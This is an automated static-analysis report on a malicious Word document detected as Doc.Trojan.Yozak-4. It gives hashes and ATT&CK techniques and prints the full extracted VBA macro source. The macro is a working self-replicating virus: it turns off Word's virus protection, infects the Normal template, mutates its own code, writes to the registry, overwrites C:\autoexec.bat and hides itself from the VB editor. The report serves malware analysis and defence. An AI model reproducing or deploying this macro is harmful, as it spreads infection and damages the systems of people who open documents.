Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d7dd7156f9b20b22…

MALICIOUS

Office (OLE)

37.5 KB Created: 1999-04-06 12:36:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: f9440fd2d402d293cf8db2bf0565adf6 SHA-1: 81b3f99ee544e54752fa517478208345ef6a6370 SHA-256: d7dd7156f9b20b22d6b5332c375b0a1382961c1f42cf05a05eeda5da1be76b57
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1059.003 Windows Command Shell

The sample contains a VBA macro that is triggered by the Document_Open event. This macro attempts to disable virus protection and then executes a subroutine named 'Payloader'. The Payloader subroutine attempts to write a value to the registry key 'Stupid' and creates a batch file 'C:\autoexec.bat' containing echo commands. The ClamAV detection 'Doc.Trojan.Yozak-4' further supports the malicious nature of this file.

Heuristics 3

  • ClamAV: Doc.Trojan.Yozak-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Yozak-4
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12590 bytes
SHA-256: 8a7e374424d3e136a157d49a454d0343370aee9ad7064cea30f4d1c06831bfef
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
Application.DisplayAlerts = wdAlertsNone
Application.EnableCancelKey = wdCancelDisabled
Dim ni As Boolean, ai As Boolean
If NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.Lines(3, 3) = "Options.VirusProtection = False" Then ni = True
If ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.Lines(3, 3) = "Options.VirusProtection = False" Then ai = True
x = VBE.ActiveVbproject.VBComponents("ThisDocument").CodeModule.Lines(1, 86)
If ni = True And ai = False Then
ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString x
ElseIf ni = False And ai = True Then
NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString x
End If
Payloader
z = "R" & Int(2354365 * Rnd)
VBE.ActiveVbproject.VBComponents("ThisDocument").CodeModule.ReplaceLine 17, z
VBE.ActiveVbproject.VBComponents("ThisDocument").CodeModule.ReplaceLine 22, "Sub " & z & "()"
End Sub
Sub Payloader()
On Error Resume Next
Randomize
If Day(Now) = Minute(Now) Then
For x = 1 To Int(6000009 * Rnd)
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE", "Stupid") = "Free Vic."
Next x
Open "C:\autoexec.bat" For Output As F
Print F; "echo Free Vic."
Print F; "echo 3C supoorts you Vic."
Print F; "Echo All VX scene support you Vic."
Print F; "echo Free Vic."
CommandBars(Int(9 * Rnd)).Name = "-Free Vic.-"
End If
End Sub
Sub HelpAbout()
MsgBox "-Free Vic-", vbApplicationModal, "Yo"
End Sub
Sub ViewVbCode()
On Error Resume Next
MsgBox "-Free Vic-"
NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.deletelines 1, 86
NormalTemplate.Saved = False
ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.deletelines 1, 86
Application.ShowVisualBasicEditor = True
End Sub
Sub FileSave()
On Error Resume Next
Randomize
If Month(Now) = Int(12 * Rnd) Then
MsgBox "-Free Vic-", vbCritical, "3C"
Selection.MoveStart
Selection.TypeText "WE use knowledge to create life."
Selection.TypeText "You use knowledge to kill life."
Selection.TypeText "And You call US criminals."
Selection.TypeText "You make drugs and YOU call US criminals"
Selection.TypeText "You make war and YOU call Us criminals"
Selection.TypeText "You let people die and YOU call US criminals"
Selection.TypeText "You use atomic energy for bombs and YOU call US criminals"
Selection.TypeText "You destroy the environment and YOU call US criminals"
Selection.TypeText "You spread disease and YOU call US criminals"
Selection.TypeText "You pedophilia and YOU call US criminals"
Selection.TypeText "YES we are CRIMINALS and our CRIME is to share"
Selection.TypeText "Our knowledge. But in comparison what you have DONE"
Selection.TypeText "WE are angels."
Selection.TypeText "Dr.yozak"
Selection.TypeText "It's the 3C way of thinking"
Selection.TypeText "-FREE VIC-"
Beep
MsgBox "Free Vic.", vbApplicationModal, "___________"
End If
ActiveDocument.Save
End Sub
Sub FileClose()
If Day(Now) = 1 Or Day(Now) = 30 Then
MsgBox "3C way of thinking", vbApplicationModal, ":P"
Open "c:\readme.txt" For Random As gr
Print gr; "It's the 3C way of thinking we are smoking blasting drinking."
Print gr; "free vic "
Print gr; "CCC-members.xoom.com/CCCriminals-CCC"
Close gr
MsgBox "Money or the Power"
MsgBox "Power or the Money"
End If
End Sub


' Processing file: /opt/analyzer/scan_staging/f8492600d448452090c0986b3d51cd36.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7646 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt V
... (truncated)